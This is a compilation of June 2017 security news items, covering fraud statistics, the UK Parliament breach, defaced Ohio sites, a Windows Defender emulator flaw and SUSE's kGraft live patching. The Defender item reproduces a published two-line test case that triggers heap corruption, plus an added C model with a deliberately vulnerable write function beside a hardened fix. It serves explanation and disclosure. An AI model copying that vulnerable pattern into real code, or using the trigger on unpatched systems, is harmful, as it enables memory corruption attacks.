The volume of money lost to this fraud is not as high as that of BEC or ransomware, but it is personal rather than corporate money -- and can affect the victims more acutely. "In 2016," says the report, "the IC3 received 10,850 tech support fraud complaints with losses in excess of $7.8 million." Notably, older victims are often the most vulnerable.

"Extortion," says the report, "is defined as an incident when a cyber criminal demands something of value from a victim by threatening physical or financial harm or the release of sensitive data." Noticeably, ransomware (which is clearly a form of extortion) is excluded from this category. It includes DoS, hitman schemes, sextortion, Government impersonation schemes and loan schemes. "In 2016, the IC3 received 17,146 extortion-related complaints with adjusted losses of over $15 million."


Google Stops Scanning Gmail Content for Ad Targeting

26.6.2017 securityweek Privacy

Google on Friday announced plans to stop scanning the content of consumer Gmail addresses for personalizing the ads it serves to users.

Previously, the Internet giant would scan each and every email message received in consumer Gmail addresses, which allowed it to better determine what relevant ads to serve to its users. The only email accounts excluded from this practice were the Google Apps for Education and G Suite accounts.

Now, Google has decided to bring all accounts onto the same page, and Diane Greene, SVP of Google Cloud, announced in a blog post on Friday that consumer accounts will be aligned with the G Suite ones.

“G Suite’s Gmail is already not used as input for ads personalization, and Google has decided to follow suit later this year in our free consumer Gmail service. Consumer Gmail content will not be used or scanned for any ads personalization after this change,” Greene says.

Once the change takes effect, ads displayed to users will be based entirely on their settings, in line with the way the company personalizes ads for other Google products. Furthermore, users will be able to change their settings at any time, and can even disable ads personalization if they wish.

G Suite, which has seen great traction among enterprise users and more than doubled its usage among large business customers, will continue to be ad free. According to Google, over 3 million paying companies use G Suite today.

Google’s free email service is very popular among consumers as well, and currently serves more than 1.2 billion users. To make Gmail even more appealing, Google also focused on improving user security and privacy.

In May 2017, the Internet giant rolled out a series of business-focused improvements to Gmail, including early phishing detection capabilities and "click-time warnings" for malicious links. In January, Google announced that Gmail will stop allowing users to attach JavaScript (.js) files to emails.


Russia Threatens to Ban Telegram Messaging App, Says It Was Used By Terrorists
26.6.2017 thehackernews BigBrothers
Russia has threatened to ban the Telegram end-to-end encrypted messaging app after Pavel Durov, its founder, refused to sign up to the country's new data protection laws.
Russia's FSB intelligence service said on Monday that the terrorists who killed 15 people in Saint Petersburg in April had used the Telegram encrypted messaging service to plot the attacks.
Under the new Russian data protection laws, since January 1 all foreign tech companies have been required to store the past six months of Russian citizens' personal data, along with encryption keys, within the country, and to share them with the authorities on demand.
"There is one demand, and it is simple: to fill in a form with information on the company that controls Telegram," said Alexander Zharov, head of the communications regulator Roskomnadzor (the state communications watchdog).
"And to officially send it to Roskomnadzor to include this data in the registry of organizers of dissemination of information. In case of refusal… Telegram shall be blocked in Russia until we receive the needed information."
Russia wants Telegram to share its users' chats and crypto keys when asked, as the encrypted messaging app has become widely popular among terrorists operating inside Russia.
Founder Pavel Durov said on Twitter that intelligence agencies had pressured the company to weaken its encryption or install a backdoor.
So far, Telegram has refused to comply with the requirements in order to protect the privacy of its more than 6 million Russian users.
In November last year, LinkedIn, the world's largest online professional network, was also banned in Russia for not complying with the country's data protection laws.


UK Parliament Hit by Cyberattack, Up to 90 MPs' E-mail Accounts Hacked
26.6.2017 thehackernews BigBrothers
A cyber attack hit the email system of the UK Houses of Parliament on Friday morning, breaching at least 90 email accounts protected by weak passwords belonging to MPs, lawmakers and other parliamentary staff.
Meanwhile, as a precaution, the security service temporarily shut down remote access to the network (from outside Westminster) to protect email accounts.
Liberal Democrat Chris Rennard has advised on Twitter that urgent messages should be sent by text message.
"We have discovered unauthorized attempts to access accounts of parliamentary network users and are investigating this ongoing incident, working closely with the National Cyber Security Centre," a parliamentary spokesperson said.
"Parliament has robust measures in place to protect all of our accounts and systems, and we are taking the necessary steps to protect and secure our network."
The authorities found that fewer than 1% of Parliament's 9,000 email addresses had been compromised in the brute-force attack, which lasted for more than 12 hours.
But if the emails were successfully accessed, experts have warned that politicians could be at risk of blackmail or terror attacks.
It is unclear who is responsible for the attack, but the breach happened just two days after the passwords of British cabinet ministers and officials were reportedly being sold online by hackers on Russian underground forums.
However, most UK officials suspect Russia or North Korea of being behind the British Parliament cyber attack.
"We are continuing to investigate this incident and take further measures to secure the computer network, liaising with Britain's National Cyber Security Centre (NCSC)," a spokeswoman said.


Windows 10 Source Code Leaked Online

26.6.2017 securityweek OS
A portion of Microsoft’s Windows 10 source code was leaked online this week on an enthusiast website that tracks Windows releases.

The source code, which Microsoft has confirmed comes from its Shared Source Initiative, was supposed to be accessible only to OEMs (Original Equipment Manufacturers) and partners.

The code was listed on the enthusiast site Beta Archive and was hosted on a free private FTP server where numerous archived Windows builds are also present.

As per the rules of the site, only beta builds that have already been superseded by newer releases are accepted, “sourced from various forum members, Windows Insider members, and Microsoft Connect members.” Core source code isn’t accepted on the site.

The leaked source code was stored in an FTP folder called “Shared Source Kit,” and Beta Archive removed it immediately after learning that it might contain sensitive data. Specifically, it removed the folder after an article on The Register came to its attention, claiming that several terabytes of internal builds and core source code had leaked online.

A Beta Archive admin named Andy also provided some explanation for this action, revealing that they decided to remove the folder from the FTP server, along with listings on the site, to review its content “just in case we missed something in our initial release.” The folder will remain offline until a full review is carried out and its content is deemed acceptable under the site’s rules.

The administrator also explains that the folder was only 1.2GB in size and that it contained “12 releases each being 100MB,” thus being far smaller than the “32TB as stated in The Register’s article.” Being this small, the folder could not possibly contain core source code, the admin also noted.

Apparently, Microsoft has already had a look at the contents of said folder and determined that it did contain “a portion of the source code from the Shared Source Initiative.” This means that the code, although not publicly accessible, was already available to Microsoft’s customers looking to license it through the program.

According to Windows internals expert Alex Ionescu, only the source code in the ARM Shared Source Kit was leaked in the incident.

"No source code has been leaked other than the ARM shared source kit." Alex Ionescu (@aionescu), June 23, 2017, https://twitter.com/aionescu/status/878379371135946752

The Register article also claimed that “top-secret builds of Windows 10 and Windows Server 2016, none of which have been released to the public,” along with “prerelease Windows 10 "Redstone" builds and unreleased 64-bit ARM flavors of Windows” were also leaked on Beta Archive.

The site does indeed list a great many beta Windows builds, some of which weren’t accessible to the public at the time of their release, but it accepts only defunct builds that have already been superseded by newer ones. These builds were added to the site over time, however, and aren’t part of a single large leak.

A large number of builds were, however, added on March 24, 2017, when some of the site’s users provided “a lot of Windows releases,” and the incident might be related to the recent arrest of two Britons for “unauthorised intrusion into networks belonging to Microsoft.”

The two supposedly hacked into Microsoft’s network between January and March this year, but no confirmation of a connection with Beta Archive has emerged. Referring to the arrests, the site’s admin said: “we don’t believe there is any connection with this alleged ‘Windows 10 core source code leak’.”


Govt Websites in Ohio, Maryland Hacked With Pro-IS Messages

26.6.2017 securityweek CyberWar
Several government websites in the US states of Ohio and Maryland had to be shut down Sunday after being hacked to display messages supporting the Islamic State group.

Among the affected websites was one belonging to Ohio Governor John Kasich.

Posted on the websites was a message from a group calling itself Team System DZ, vowing revenge against US President Donald Trump.

"You will be held accountable Trump, you and all your people for every drop of blood flowing in Muslim countries," it read, adding: "I Love Islamic state."

The messages were written in gold lettering against a black backdrop.

The hacked websites also displayed the Muslim profession of faith written in white lettering in Arabic, proclaiming that "there is no god but Allah and Muhammad is the prophet of Allah."

The message posted on Kasich's website also played an Islamic call to prayer.

A website for Howard County, Maryland, several miles outside Washington DC, was also affected.

Some of the websites remained out of service early Monday, while Kasich's www.governor.ohio.gov site was back up and running after being taken offline Sunday.


Corvil Integrates its Security Analytics Into Cisco's Tetration Platform

26.6.2017 securityweek Security
At Cisco Live in Las Vegas on Monday, IT analytics firm Corvil announced the integration of its Security Analytics with the Cisco Tetration Analytics platform. The intention is to combine Corvil's real-time packet-level analysis with Tetration's vast big data repository of downstream application-level data flows to provide early, rich, granular and consistent detection of anomalous communications indicative of compromise.

Tetration was launched by Cisco in June 2016. It was described as "a platform designed to help customers gain complete visibility across everything in the data center in real time -- every packet, every flow, every speed." The aim is to give CIOs and CISOs complete visibility into today's complex, dynamic and heterogeneous data center.

In February 2017, Cisco announced Tetration 2, now automating policy enforcement and providing APIs. "Cisco is continuing its tradition of open ecosystems by working with partner companies to build applications and integrations with their solutions," it announced. It can be used, said the announcement, to "define use cases specific to their environment, and deploy validated application segmentation policies."

It is into this that Corvil has integrated its Security Analytics product.

"Cisco records the communications flows, and puts those flows into this big repository called Tetration," David Murray, chief business development officer at Corvil, told SecurityWeek. "It then uses those flows to be able to map application interdependencies and say here is how applications are communicating -- but it's a lot of data they're aggregating, billions of flows that are communicating on an ongoing basis, across an enterprise."

This is an essential step in the evolution of network surveillance, suggests Murray. "If you think about historical systems surveillance -- especially where regulation and governance requires that surveillance -- the original perimeter and signature surveillance is no longer adequate. Surveillance has now evolved into monitoring what is communicating with what and when -- but even then it is hard to provide sufficient granularity. It is increasingly not just who is communicating with what and when, but also what is actually being communicated."

This is where Corvil's Security Analytics, with its real-time packet-level analysis, adds value to Tetration. "For example," said Murray, "flow data by its nature is going to see a certain amount of communication between two points. It may even understand that a particular protocol is being used; for example, it might recognize DNS traffic. But by opening up the packet we are able to see what is happening within that flow; that, for example, there is something tunneling within that DNS traffic. Or we're able to see specific filenames, or error types that are being reported back and forth within that communication. Furthermore, we're able to see things like which user is logged on by analyzing packet data for LDAP and Kerberos."

This is where the integration with Tetration 2 becomes particularly valuable. "By taking this information," he continued, "and enriching the flow data (such as administrator level tunneling data with a particular type of fileset) we provide the ability to initiate an automatic response through Tetration that says 'immediately quarantine that host'."

The value of Corvil to Tetration customers is that security policy enforcement can be invoked on an analysis of the flow content rather than just the flows themselves. The value of Tetration to Corvil is that it provides a massive big data repository of downstream data that can be analyzed to provide more accurate responses and reduce false positives.

"Improvements in security operations, network optimization, and business process optimization hinge on applying advanced analytics techniques to network data,” said Shamus McGillicuddy, senior analyst for Enterprise Management Associates. "The depth and insight from Corvil Analytics combined with Cisco's Tetration Analytics will provide richer understanding of workload characteristics, improved detection of evasive security threats, and more effective transaction insight. This type of integration is needed to drive tighter alignment between network, application, security, and business teams."

"It takes an ecosystem to address today's complex challenges of data center visibility, service assurance, and security," said Murray. "The combination of Cisco Tetration's data and our packet-level data helps provide very granular and enforceable security policies."

Further information on the integration of Corvil Security Analytics with Cisco Tetration Analytics will be available at Cisco Live this week.


Google Hacker Finds a New Way to Bypass Microsoft Windows Defender
26.6.2017 securityaffairs Vulnerability

The Google Project Zero expert Tavis Ormandy has found a flaw in Windows Defender that allows attackers to bypass the Microsoft anti-virus tool.
The popular Google Project Zero hacker Tavis Ormandy has discovered a new bug in Windows Defender that allows attackers to circumvent Microsoft's anti-virus tool.

Ormandy publicly disclosed the vulnerability in Windows Defender on Friday, after Microsoft had released a fix for its software. Ormandy had reported the vulnerability to Microsoft on June 9th.

The vulnerability resides in the non-sandboxed x86 emulator that Windows Defender uses.

The expert explained that the “apicall” instruction can invoke internal emulator APIs, running them with SYSTEM privileges; unfortunately, it is exposed to remote attackers by default.

The researcher discovered a heap corruption issue in the KERNEL32.DLL!VFS_Write API.

“I discussed Microsoft’s “apicall” instruction that can invoke a large number of internal emulator apis and is exposed to remote attackers by default in all recent versions of Windows. I asked Microsoft if this was intentionally exposed, and they replied “The apicall instruction is exposed for multiple reasons”, so this is intentional,” wrote Ormandy.

“This full system x86 emulator runs as SYSTEM, is unsandboxed, is enabled by default and remotely accessible to attackers. I took a quick stab at writing a fuzzer and immediately found heap corruption in the KERNEL32.DLL!VFS_Write API, I suspect this has never been fuzzed before.”

Tavis Ormandy (@taviso), 8:11 PM, 23 Jun 2017: "I wrote a fuzzer for the unsandboxed x86 emulator in Windows Defender and found arbitrary read/write. https://bugs.chromium.org/p/project-zero/issues/detail?id=1282"

After the disclosure of the bug, Ormandy published a minimal test case that triggers it:

MpApiCall("NTDLL.DLL", "VFS_Write", 1, Buf, 0, 0xffffffff, 0);
MpApiCall("NTDLL.DLL", "VFS_Write", 1, Buf, 0x7ff, 0x41414141, 0);

“The first call extends the length of the file to nOffset, but because the numberOfBytes parameter is 0 no space is allocated. Then you can read and write arbitrary data to an arbitrary offset to the MutableByteStream object buffer. This is a very powerful exploit primitive, and exploitation does not seem difficult,” he added.
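The bug class Ormandy describes (a stream whose logical length is extended without allocating the storage behind it), shown as an added C model beside a hardened version. This is example code written for this page, not Microsoft's MutableByteStream or VFS_Write implementation; the byte_stream type, the STREAM_MAX bound and the replayed values are constructed.

```c
/*
 * Hypothetical model of the bug class from the quoted description.
 * NOT Microsoft's code: byte_stream, STREAM_MAX and the scenarios are
 * constructed for illustration.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    uint8_t *data;   /* backing storage */
    size_t   cap;    /* bytes actually allocated */
    size_t   len;    /* logical length of the stream */
} byte_stream;

/* Invariant every growable buffer must keep: len never exceeds cap. */
bool stream_consistent(const byte_stream *s) { return s->len <= s->cap; }

/* Ensure at least `need` bytes of storage; the new tail is zeroed. */
static bool stream_reserve(byte_stream *s, size_t need) {
    if (need <= s->cap) return true;
    uint8_t *p = realloc(s->data, need);
    if (!p) return false;
    memset(p + s->cap, 0, need - s->cap);
    s->data = p;
    s->cap = need;
    return true;
}

/* Buggy write: when the file grows, storage is only reserved if there is
 * something to copy, so a zero-byte write at a huge offset leaves len far
 * beyond cap. Every later write inside [0, len) then trusts that storage
 * exists and goes off the end of the heap allocation. */
bool vuln_write(byte_stream *s, const uint8_t *buf, size_t n, size_t offset) {
    size_t end = offset + n;                       /* no wrap check either */
    if (end > s->len) {
        if (n > 0 && !stream_reserve(s, end)) return false;
        s->len = end;                              /* extended even for n == 0 */
    }
    if (n > 0) memcpy(s->data + offset, buf, n);   /* checked against len, not cap */
    return true;
}

#define STREAM_MAX (64u * 1024u * 1024u)   /* hypothetical upper bound, 64 MiB */

/* Hardened write: reject wrap-around and absurd sizes, and reserve storage
 * for ANY extension of len, so len <= cap holds after every call. */
bool safe_write(byte_stream *s, const uint8_t *buf, size_t n, size_t offset) {
    if (offset > SIZE_MAX - n) return false;        /* offset + n would wrap */
    size_t end = offset + n;
    if (end > STREAM_MAX) return false;             /* refuse to grow that far */
    if (!stream_reserve(s, end)) return false;
    if (end > s->len) s->len = end;
    if (n > 0) memcpy(s->data + offset, buf, n);
    return true;
}

/* Replay only the first (zero-byte, huge-offset) call against the buggy
 * model and report how many logical bytes have no storage behind them. */
size_t vuln_unbacked_bytes(void) {
    byte_stream s = {0};
    uint8_t buf[1] = {0};
    vuln_write(&s, buf, 0, 0xffffffffu);
    size_t gap = s.len - s.cap;
    free(s.data);
    return gap;
}

/* Same sequence against the hardened model: the huge extension is refused,
 * an ordinary write still works, and the invariant holds throughout. */
bool safe_sequence_ok(void) {
    byte_stream s = {0};
    uint8_t buf[0x10];
    memset(buf, 0x41, sizeof buf);
    bool first  = safe_write(&s, buf, 0, 0xffffffffu);   /* must be rejected */
    bool second = safe_write(&s, buf, sizeof buf, 0x7ff);
    bool ok = !first && second && stream_consistent(&s) &&
              s.len == 0x7ff + sizeof buf && s.data[0x7ff] == 0x41 && s.data[0] == 0;
    free(s.data);
    return ok;
}

int main(void) {
    return vuln_unbacked_bytes() > 0 && safe_sequence_ok() ? 0 : 1;
}
```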

Microsoft released a fixed version of the Malware Protection Engine, version 1.1.13903.0.


Live kernel patching: kGraft handles it without downtime
26.6.2017 Root.cz Vulnerabilities
A Linux server has to be restarted for software reasons in only one case: when the kernel needs to be replaced. With the kGraft technology, even that is no longer necessarily true. It can swap one function for another while the system is fully running.
Live kernel patching makes it possible to simplify the administration of large servers and to fix the most serious problems at runtime, says Jiří Kosina of the Prague office of SUSE. We have a large group of kernel developers here who work on drivers, the scheduler and so on, Kosina said at the start by way of introduction. The newest thing we are working on here is patching the Linux kernel at runtime. People often ask the developers what such a thing is even needed for, when a reboot costs nothing. We do it mainly because our customers asked for it. Rebooting a whole data center is not free either; it costs an enormous amount.

Large data centers have precisely planned maintenance cycles, usually on the order of months. Every unexpected system restart brings additional costs. When a security problem appears, or a stability problem that could bring the systems down, it is very expensive for them to schedule a restart of the entire data center at short notice. Companies therefore want the ability to secure the kernel immediately and then, in a safe state, wait for the next planned maintenance window.
This is only an indirect consequence of the fact that booting an enterprise server can take as long as three quarters of an hour. When you have sixteen terabytes of RAM, just its initialization by the BIOS can easily take forty minutes. For that reason too it cannot be done faster; it will always cost you time during which the server is not working, Kosina explained.

kGraft needs no pause
SUSE developers created their own live-patching technology, kGraft, which they already offer commercially and which customers have deployed in production. We departed somewhat from our usual philosophy here, which is normally to send everything upstream to Linus first. But kGraft is a very new thing and quite extensive. We wanted to have some real deployments and users first, and now we are sending the whole thing into the kernel piece by piece. We are essentially done with it. The kernel sources already contain the CONFIG_LIVEPATCH option, which enables the corresponding API for updating kernel functions at runtime.
An example of a server you do not want to restart
A live kernel patch has a special format, and SUSE does not provide all patches in this form by any means. It is not possible, because it is beyond our capacity; it is a lot of manual work. Patches are therefore limited to security problems, bugs that cause instability, or bugs that can potentially corrupt data. So if we know there is a bug in the kernel that allows someone to get root, or someone is able to deliberately corrupt data, we create a live patch. New hardware drivers, for example, are not distributed in this form.

The developers say they were surprised at the outset that the kernel did not need any special modification. We built an entire new infrastructure, but we changed relatively little in the existing code. Later, edge cases appeared where more changes to the sources were needed. Patching the scheduler, for example, is very interesting, and we also added the ability to fix kGraft itself. That is quite complicated too, but it can be done.

The advantage of kGraft is that the kernel does not stop at all during patching. You may have heard of Ksplice, which works differently. It sends an interrupt to all processors, they all gather in an infinite loop, then the kernel is swapped and they are started again. The system is not rebooted, but there is the potential for an outage on the order of hundreds of milliseconds during which the kernel can do nothing at all. We chose a different approach, where the kernel's activity never stops and the code gradually moves into the new state.

There is also a variant called Kexec, which in reality does something different: it boots a new kernel in place of the old one. You save the hardware initialization time, but all your processes, files and TCP connections are lost. You are simply replacing the whole kernel, lock, stock and barrel.

Preparation is necessary
So how do you modify code live without breaking anything? We use several interesting tricks there. The whole kernel is compiled with GCC using the -pg parameter, which generates profiling code. At the start of every function the compiler adds a jump into a profiling function, which is expected to measure how many times the function was used, how long it ran and so on. The kernel does not use this feature, though, so the developers take the added call and "steal it" for themselves. At this spot we are able, when needed, to insert a redirection to the fixed version of the function, Kosina says, describing the basic principle.
At kernel boot, all the added calls are then rewritten so that they contain only the NOP instruction. It does nothing (NOP = no operation) and the kernel runs normally. Every kernel function thus has five bytes at its start that are skipped during execution and do not affect its behaviour in any way. The space prepared this way can then be used at any later time to insert a JUMP instruction followed by the address of the new function. With this trick we redirect the kernel to a different function, and the rest of the original one is never executed again.

Live patching is currently supported on x86; work is under way on S/390, PowerPC and ARM64. Adding further architectures is not a problem, as most of the code is shared; we just have to teach GCC to add the function prologues correctly, and that is essentially all.

Modifying the kernel under full load
How does the redirection itself take place? The essential point is that the change must be atomic and the function must never be broken. It can be called by the kernel at any moment and must run without stopping and as expected. The function prologue must be five bytes (the JUMP instruction plus the address), but the x86 platform only allows four bytes to be swapped atomically. We must not get into a situation where four bytes have already been replaced and the fifth has not, and the kernel jumps into a function in this half-finished state.

So another interesting trick is used, which makes it possible to cleverly swap all the bytes atomically "at once". When we want to start patching, we fill the prepared space with five one-byte INT 3 instructions, which is a software breakpoint. If at any moment the processor wants to execute the function, it hits NOP or INT 3 instructions at the start. In this case the breakpoint is handled by the kernel itself, which knows about the patching in progress and therefore jumps straight past the five-byte prologue. So we treat it as if no breakpoint were there, and the function runs normally.

Gradual replacement of the address in the prologue
The five breakpoints are replaced, one by one from the back, with the address of the new function. At any moment there is still at least one breakpoint in front of the address, so the rewrite can take arbitrarily long and the function remains executable in its original form. Only in the final step do we replace the first breakpoint with the JUMP instruction, completing the redirection from the old form of the function to the new one. With this procedure the developers can always be certain that the processor will never encounter inconsistent data on which it would crash.
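The prologue rewrite described above, as an added C simulation written for this page (not SUSE's kGraft or ftrace code): the five prologue bytes are a byte array, and after every single-byte store the code asks what a CPU entering the function would do, so the naive front-to-back rewrite can be compared with the INT 3 back-to-front sequence. The opcode values are the x86 ones the text names; the kernel addresses are constructed.

```c
/*
 * Simulation of kGraft-style prologue patching. Added example, not SUSE code.
 * The "CPU" model: NOP or INT 3 at byte 0 means the kernel skips the prologue
 * and runs the original body (the breakpoint handler knows a patch is in
 * flight); a JMP is only safe once all four displacement bytes are in place.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PROLOGUE_LEN 5
#define OP_NOP  0x90   /* 1-byte NOP, the boot-time filler */
#define OP_INT3 0xCC   /* software breakpoint, handled by the kernel */
#define OP_JMP  0xE9   /* JMP rel32: opcode + 4-byte displacement */

enum outcome { RUN_ORIGINAL, RUN_NEW, EXECUTE_GARBAGE };

/* rel32 displacement for a JMP at `from` that lands on `to`. */
int32_t jmp_rel32(uint64_t from, uint64_t to) {
    return (int32_t)(to - (from + PROLOGUE_LEN));
}

/* What happens if a CPU starts executing `pro` right now. */
enum outcome execute_prologue(const uint8_t *pro, int32_t want_rel) {
    if (pro[0] == OP_NOP || pro[0] == OP_INT3)
        return RUN_ORIGINAL;
    if (pro[0] == OP_JMP) {
        uint32_t rel = (uint32_t)pro[1] | (uint32_t)pro[2] << 8 |
                       (uint32_t)pro[3] << 16 | (uint32_t)pro[4] << 24;
        return rel == (uint32_t)want_rel ? RUN_NEW : EXECUTE_GARBAGE;
    }
    return EXECUTE_GARBAGE;
}

/* One single-byte store, then re-check; 1 if the state was unsafe. */
static int store_and_check(uint8_t *pro, int idx, uint8_t val, int32_t rel) {
    pro[idx] = val;
    return execute_prologue(pro, rel) == EXECUTE_GARBAGE;
}

/* Naive front-to-back rewrite: JMP opcode first, displacement after.
 * Returns the number of unsafe intermediate states (nonzero = crash risk). */
int naive_patch(uint8_t *pro, int32_t rel) {
    int unsafe = store_and_check(pro, 0, OP_JMP, rel);
    for (int i = 0; i < 4; i++)
        unsafe += store_and_check(pro, 1 + i, (uint8_t)((uint32_t)rel >> (8 * i)), rel);
    return unsafe;
}

/* kGraft order: fill with INT 3, write the displacement back to front while
 * byte 0 stays INT 3, and only then flip byte 0 to JMP. Returns unsafe count. */
int kgraft_patch(uint8_t *pro, int32_t rel) {
    int unsafe = 0;
    for (int i = 0; i < PROLOGUE_LEN; i++)
        unsafe += store_and_check(pro, i, OP_INT3, rel);
    for (int i = 3; i >= 0; i--)                  /* bytes 4, 3, 2, 1 */
        unsafe += store_and_check(pro, 1 + i, (uint8_t)((uint32_t)rel >> (8 * i)), rel);
    unsafe += store_and_check(pro, 0, OP_JMP, rel); /* the single atomic flip */
    return unsafe;
}

/* Run one strategy from the boot-time state (five NOPs) with constructed
 * kernel addresses; returns how many intermediate states were unsafe. */
int demo_unsafe_states(int use_kgraft) {
    uint8_t pro[PROLOGUE_LEN];
    int32_t rel = jmp_rel32(0xffffffff81000000ull, 0xffffffffa0001000ull);
    memset(pro, OP_NOP, sizeof pro);
    return use_kgraft ? kgraft_patch(pro, rel) : naive_patch(pro, rel);
}

/* 1 if the untouched prologue runs the original and the finished kGraft
 * prologue redirects to the new function. */
int demo_kgraft_redirects(void) {
    uint8_t pro[PROLOGUE_LEN];
    int32_t rel = 0x1234;
    memset(pro, OP_NOP, sizeof pro);
    if (execute_prologue(pro, rel) != RUN_ORIGINAL) return 0;
    kgraft_patch(pro, rel);
    return pro[0] == OP_JMP && execute_prologue(pro, rel) == RUN_NEW;
}

int main(void) {
    printf("naive rewrite:  %d unsafe intermediate states\n", demo_unsafe_states(0));
    printf("kGraft rewrite: %d unsafe intermediate states\n", demo_unsafe_states(1));
    return demo_kgraft_redirects() ? 0 : 1;
}
```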

The modified function thus ultimately begins with a jump into kGraft code, which has to decide where the jump continues. We share those five bytes with ftrace, which lets the kernel turn on various mechanisms for tracing the behaviour of individual functions. Logic therefore has to be inserted between the new and the old form of the function that decides what follows the jump. If it is our jump for a modified function, another jump follows to the new form, which again begins with five unused bytes. That is for the case where the function needs to be fixed again at some later time. It is possible either to intervene again in the call to the original function or to chain the individual jumps.

Execution of a function before and after the fix
One module to rule them all
The kernel can be patched function by function, but for practical reasons customers are always shipped one large cumulative patch in the form of an ordinary .ko module. The latest one always contains everything, so with the latest version we always replace all previously patched functions. That is no problem at all, because according to Kosina the duration of patching does not depend on how many functions are modified. One large update is more advantageous for us, because we always know what state the system is in. Otherwise users would apply various changes and sets of patches at random, and we would not be able to support such a system.

Creating a patch is largely manual work, which according to Jiří Kosina has the advantage, above all, that the developer can actually go through and check the entire code. It is usually a whole group of functions, because it usually turns out that more has to be replaced because of one bug. The problem is that these functions depend on each other and consistency again has to be maintained. It may happen that the new version of a function has a different number of parameters, which has to be reflected in the other functions too. It must therefore always be ensured that different generations of functions do not mix. Old calls old or new calls new, never crosswise.

The kernel therefore additionally keeps track of what state the in-progress patching is in and sends individual processes entering the kernel either down the old path or down the new one. We say that we keep track of which universe a given process is in: whether in the old one or already in the new one. Based on this context, at the boundary between user space and kernel space we let it into the correct functions. Individual processes are thus gradually marked according to whether their functions have already been patched or not. Once all processes are marked, we can declare that the kernel patching is finished and everything is already running on the new code. The kernel thus gradually "drifts" into the migrated state.

Decision at kernel entry
This process, however, cannot yet modify data structures in the kernel. We can only replace code, but we cannot do it when data changes at the same time. We would have to find all instances of this data in memory, which is not possible, and at the same time all the code that works with it. Fortunately, this does not happen very often with security patches. In a year and a half we have done several hundred patches, and it happened to us once that we had to intervene in data. According to Kosina, though, even this has several possible solutions and the developers are working on them. It is not a big problem, but we would like to solve it in the future.

Fixing on the fly
The advantage of kGraft is that it really does not stop the server being fixed for even a moment. The disadvantage is that patches have to be created by hand. According to Kosina, though, this is not a problem in practice, because a single developer at SUSE handles it. The hardest part is usually understanding what a given change does, which need not be trivial. But we manage to release the fixes at the same time as we distribute them in standard form. Users can thus choose. The developers also support up to twenty different kernel versions in different products. Users do not want to restart servers, so we cannot tell them that we only support the latest kernel and that they should restart and replace theirs.

Running patched functions of course also has some overhead. It is a few extra instructions per function, which may or may not be a lot. If a function is called very sporadically, its patch has no effect on system performance. If, on the other hand, it is used very frequently, the delay begins to show. As long as a function is not patched, though, the modification has no effect at all. It just takes up five more bytes in memory, so the kernel is slightly bloated.

In total, the SUSE developers say they have released almost a thousand such patches in a year and a half. Their number is by no means steady, though: sometimes nothing happens, and then someone discovers a bug, others pounce on it and discover a pile more.


Hackers threatened Trump on US government websites

26.6.2017 Novinky/Bezpečnost BigBrother
On Sunday, the websites of government agencies of the US state of Ohio were attacked by a group of hackers that supports the terrorist organization Islamic State (IS). On the hacked sites, including that of Ohio Governor John Kasich, the cyber criminals posted a threatening message addressed to US President Donald Trump and the American people. The BBC reported this on Monday.
"You, Trump, and all your people will be held accountable for every drop of blood that flows in Muslim countries," read the message, carrying the Arabic logo of the group Team System DZ. The message ended with the words: "I love Islamic State."

According to the BBC, this hacker group has become known in the past for similar actions, but with hateful messages aimed at Israel.

The Islamic State (IS) movement conquered substantial territory in Iraq and Syria in 2014, but in recent months it has suffered significant losses in both countries. The United States leads an international coalition that helps local forces fight IS in Iraq and Syria.


The president has signed the amendment to the Cyber Security Act

26.6.2017 SecurityWorld Cyber
Last week President Miloš Zeman signed the amendment to the Cyber Security Act. A new authority will be created that will work to prevent hacker attacks and propose measures for handling ongoing incidents. The act will also apply to operators of information systems in the energy and transport sectors, who will have to report security incidents.
The amendment to the Cyber Security Act brings a significant expansion of the so-called obligated entities, which will have a statutory duty to address cyber security and take appropriate steps to prevent security risks.

It newly introduces this obligation into a whole range of important sectors, such as healthcare and others that provide critical "essential services" such as utilities.

One of the most important obligations for all these companies is to monitor what is happening in their own networks and information systems, to be able to evaluate security attacks and to report them to the security authority in time.

This obligation is seen as key, because today most companies unfortunately do not even meet the basic requirements of so-called cyber hygiene, which consist, among other things, precisely in the ability to detect attacks, to uncover, analyze and manage risks, and to share information about attacks across individual enterprises, which helps other institutions prepare better and in time for a possible threat.

A new authority will also be created that will work to prevent hacker attacks and propose measures for handling security incidents. This specialized body will take over part of the role of the National Security Authority. Failure to meet the new obligations carries a fine of up to five million crowns.

The risk of cyber attacks is rising worldwide; in the Czech Republic there may be up to 1.7 million cyber attacks a year, with possible losses of up to 5.4 billion crowns, according to data from the Czech Insurance Association.

Public reports about successful cyber attacks are, however, still less common in the Czech environment than abroad, which is partly due to two factors:

Detection capability (that is, the ability to even notice an attack in progress) is on average fairly weak in the Czech Republic. As part of risk prevention, companies should therefore use modern detection tools, which are essential for uncovering modern threats, and secure qualified experts and security analysts.
When an attack is uncovered in a company, it is now fairly common practice to "keep quiet" and give nothing away. Under the Cyber Security Act, the affected companies now have a duty to report the incident to the authority. The GDPR regulation takes a very similar approach to this area, also requiring that every such incident be recorded and that the more significant ones be reported within 72 hours.

Who will the amendment primarily affect?

The amended Cyber Security Act (ZKB) will newly apply to a large group of companies that are operators of so-called essential services, e.g. banks, hospitals, transport companies etc., or providers of so-called digital services, that is, e-commerce platforms and search engines (in the previous version of the act in force, these companies remained outside its scope).

An essential service is, in the words of the act, "a service whose provision depends on networks or information systems and whose disruption could have a significant impact on securing key societal or economic activities in one of the following sectors: energy, transport, banking, financial market infrastructure, healthcare, drinking water supply and distribution, digital infrastructure, the chemical industry and public administration."

A digital service is then understood as "an information society service consisting in the provision of an online marketplace service that allows consumers to conclude purchase contracts or service contracts with sellers online, an internet search engine, or cloud computing that enables access to a scalable and elastic pool of shareable computing resources".

The amendment to the Cyber Security Act will probably be welcomed by anyone with common sense who knows that today it is truly vital to ensure the security of information systems, especially in the critical sectors mentioned, such as energy, water utilities, healthcare etc. Healthcare in particular has so far suffered from a considerable inability to secure the necessary resources, whether financial or human, for this purpose. The act should now help them with that.

For most enterprises, however, meeting the ZKB requirements on time will be very difficult given the high degree of neglect and underfunding in past years.

How should the rules of the ZKB amendment be reconciled with other legislation in this area, e.g. GDPR, going forward?

